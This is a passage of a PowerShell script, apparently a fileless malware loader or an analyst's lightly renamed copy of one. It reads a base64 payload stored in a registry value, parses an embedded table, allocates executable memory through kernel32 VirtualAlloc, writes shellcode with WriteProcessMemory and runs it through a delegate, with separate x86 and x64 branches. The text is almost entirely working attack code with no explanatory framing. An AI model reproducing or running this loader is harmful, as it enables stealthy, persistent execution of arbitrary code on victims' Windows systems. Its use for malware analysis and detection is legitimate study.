	$TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
	$ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters);
	$ConstructorBuilder.SetImplementationFlags('Runtime, Managed');
	$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters);
	$MethodBuilder.SetImplementationFlags('Runtime, Managed');
	Write-Output $TypeBuilder.CreateType();
	}

	function Unknown-FunctionTwo($F2DataIn, $Integer_2) {
	$DataOut = $F2DataIn[$Integer_2+0] * 16777216;
	$DataOut += $F2DataIn[$Integer_2+1] * 65536;
	$DataOut += $F2DataIn[$Integer_2+2] * 256;
	$DataOut += $F2DataIn[$Integer_2+3] * 1;
	return $DataOut;
	}

	$ImportTable = @"
	[DllImport("kernel32.dll")]
	public static extern IntPtr GetCurrentProcess();

	[DllImport("kernel32.dll")]
	public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

	[DllImport("kernel32.dll")]
	public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written);

	[DllImport("kernel32.dll")]
	public static extern uint SetErrorMode(uint uMode);
	"@

	$WinFunc = Add-Type -memberDefinition $ImportTable -Name "Win32" -namespace Win32Functions -passthru;

	function Unknown-FunctionThree($ImportTable, $dAau1, $M5hD1rY) {
	$HandlerGetCurrentProcess = $WinFunc::GetCurrentProcess();
	$HandlerVirtualAlloc1 = $WinFunc::VirtualAlloc(0, $ImportTable.Length, 0x00003000, 0x40);
	$HandlerVirtualAlloc2 = $WinFunc::VirtualAlloc(0, $M5hD1rY.Length, 0x00003000, 0x40);
	$WinFunc::WriteProcessMemory($HandlerGetCurrentProcess, $HandlerVirtualAlloc1, $ImportTable, $ImportTable.Length, 0) \| Out-Null;
	$WinFunc::WriteProcessMemory($HandlerGetCurrentProcess, $HandlerVirtualAlloc2, $M5hD1rY, $M5hD1rY.Length, 0) \| Out-Null;
	$IntOfHandlerVirtualAlloc1PlusdAau1 = [IntPtr]($HandlerVirtualAlloc1.ToInt64()+$dAau1);
	$JjmOV = Get-DelegateType @([IntPtr], [IntPtr]) ([Void]);
	$DFAhyM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IntOfHandlerVirtualAlloc1PlusdAau1, $JjmOV);
	$WinFunc::SetErrorMode(0x8006) \| Out-Null;
	$DFAhyM.Invoke($HandlerVirtualAlloc2, $HandlerVirtualAlloc1);
	}

	function Unknown-FunctionFour($ByteArrayFromEnImportTabledData, $integer_1) {
	$IahTr = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData 1;
	$value_5 = 5;
	while ($value_5+8 -lt $IahTr) {
	$QheRB6j6 = $ByteArrayFromEnImportTabledData[$value_5];
	$z2i2CBvTZG = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData ($value_5+1);
	$UAaIjo1Ssa = Unknown-FunctionTwo $ByteArrayFromEnImportTabledData ($value_5+5);
	$value_5 += 9;
	if ($QheRB6j6 -eq $integer_1) {
	Unknown-FunctionThree $ByteArrayFromEnImportTabledData[$value_5..($value_5+$z2i2CBvTZG)] $UAaIjo1Ssa $ByteArrayFromEnImportTabledData;
	break;
	} else {
	$value_5 += $z2i2CBvTZG;
	}
	}
	}

	$EnImportTabledData = (Get-ItemProperty -Path "$RegKey" -Name "$RegName").$RegName;
	$ByteArrayFromEnImportTabledData = [System.Convert]::FromBase64String($EnImportTabledData);
	$ByteArrayFromEnImportTabledData[0] = 0;

	if ([IntPtr]::Size -eq 8) {
	# x64 branch
	Unknown-FunctionFour $ByteArrayFromEnImportTabledData 2;
	} else {
	# x86 branch
	Unknown-FunctionFour $ByteArrayFromEnImportTabledData 1;
	}